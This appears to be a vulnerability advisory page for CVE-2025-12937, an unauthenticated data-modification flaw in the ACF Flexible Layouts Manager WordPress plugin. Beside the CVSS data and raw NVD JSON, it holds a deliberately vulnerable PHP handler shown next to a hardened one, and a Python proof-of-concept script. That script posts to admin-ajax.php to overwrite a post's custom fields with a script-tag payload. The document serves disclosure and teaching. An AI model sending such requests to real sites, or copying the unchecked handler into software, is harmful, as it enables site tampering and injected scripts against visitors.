Security Vulnerability Report
CVE-2025-12937 CVSS 6.5 MEDIUM

CVE-2025-12937

Published: 2025-11-18 09:15:49
Last Modified: 2026-04-15 00:35:42

Description

The ACF Flexible Layouts Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'acf_flm_update_template_with_pasted_layout' function in all versions up to, and including, 1.1.6. This makes it possible for unauthenticated attackers to update custom field values on individual posts and pages.
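The weakness class here is CWE-862 (missing authorization): an admin-ajax.php action that modifies post data without confirming that the caller is allowed to edit that post. As an added illustration that is not the plugin's code and not taken from this report, the block below contrasts the general shape of such a handler with a hardened one. All function, hook and field names (`example_update_layout*`, `example_flexible_layout`) are hypothetical; the WordPress and ACF calls (`add_action`, `check_ajax_referer`, `current_user_can`, `wp_send_json_*`, `update_field`) are real APIs.

```php
<?php
// Added illustration of the CWE-862 pattern; these are hypothetical handlers,
// not the ACF Flexible Layouts Manager plugin's actual code.

// --- Vulnerable shape: hooked for unauthenticated callers via wp_ajax_nopriv_*
// --- and trusting the request without any authorization check.
add_action( 'wp_ajax_nopriv_example_update_layout_v1', 'example_update_layout_unchecked' );
add_action( 'wp_ajax_example_update_layout_v1', 'example_update_layout_unchecked' );
function example_update_layout_unchecked() {
    $post_id = absint( $_POST['post_id'] ?? 0 );
    $layout  = json_decode( wp_unslash( $_POST['layout_data'] ?? '' ), true );
    // Anyone who can reach admin-ajax.php can rewrite the field on any post.
    update_field( 'example_flexible_layout', $layout, $post_id ); // ACF API
    wp_send_json_success();
}

// --- Hardened shape: logged-in callers only (no nopriv hook), nonce verified,
// --- and a per-post capability check before anything is written.
add_action( 'wp_ajax_example_update_layout_v2', 'example_update_layout_checked' );
function example_update_layout_checked() {
    // Dies with -1 unless $_POST['nonce'] was created with
    // wp_create_nonce( 'example_update_layout_v2' ) for this user.
    check_ajax_referer( 'example_update_layout_v2', 'nonce' );

    $post_id = absint( $_POST['post_id'] ?? 0 );
    // Authorization: the current user must be allowed to edit this specific post.
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $layout = json_decode( wp_unslash( $_POST['layout_data'] ?? '' ), true );
    if ( ! is_array( $layout ) ) {
        wp_send_json_error( 'bad payload', 400 );
    }

    update_field( 'example_flexible_layout', $layout, $post_id );
    wp_send_json_success();
}
```

The two handlers are alternatives, shown together only for comparison. The nonce alone is not an authorization control (it proves the request originated from a page the same user loaded, and an anonymous visitor can obtain one); the `current_user_can( 'edit_post', $post_id )` check is what closes the gap the CVE describes, and dropping the `wp_ajax_nopriv_` registration keeps the endpoint off the unauthenticated surface entirely.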

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ACF Flexible Layouts Manager <= 1.1.6 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-12937 PoC - Unauthenticated Data Modification
# Target: WordPress with ACF Flexible Layouts Manager <= 1.1.6

target_url = "http://target-wordpress-site.com"
ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Target post/page ID to modify
target_post_id = 1

# Malicious custom field data to inject
malicious_data = {
    "acf_flexible_layout": [
        {
            "layout_key": "text_block",
            "content": "<script>alert('XSS')</script>"
        }
    ]
}

# Construct the exploit request
exploit_payload = {
    "action": "acf_flm_update_template_with_pasted_layout",
    "post_id": target_post_id,
    "layout_data": json.dumps(malicious_data),
    "security_token": ""  # No security token required due to missing capability check
}

print("[*] Sending exploit request...")
print(f"[*] Target: {ajax_endpoint}")
print(f"[*] Post ID: {target_post_id}")

response = requests.post(ajax_endpoint, data=exploit_payload, timeout=10)

print(f"[*] Response Status: {response.status_code}")
print(f"[*] Response Body: {response.text}")

if response.status_code == 200:
    print("[+] Exploit sent successfully - Custom field may be modified")
else:
    print("[-] Exploit failed")

References

https://plugins.trac.wordpress.org/browser/acf-flexible-layouts-manager/trunk/includes/ajax/ajax-paste.php#L4
https://www.wordfence.com/threat-intel/vulnerabilities/id/915cce97-8305-4249-b2d3-c4da2f59a95a?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12937", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:49.470", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ACF Flexible Layouts Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'acf_flm_update_template_with_pasted_layout' function in all versions up to, and including, 1.1.6. This makes it possible for unauthenticated attackers to update custom field values on individual posts and pages."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/acf-flexible-layouts-manager/trunk/includes/ajax/ajax-paste.php#L4", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/915cce97-8305-4249-b2d3-c4da2f59a95a?source=cve", "source": "[email protected]"}]}}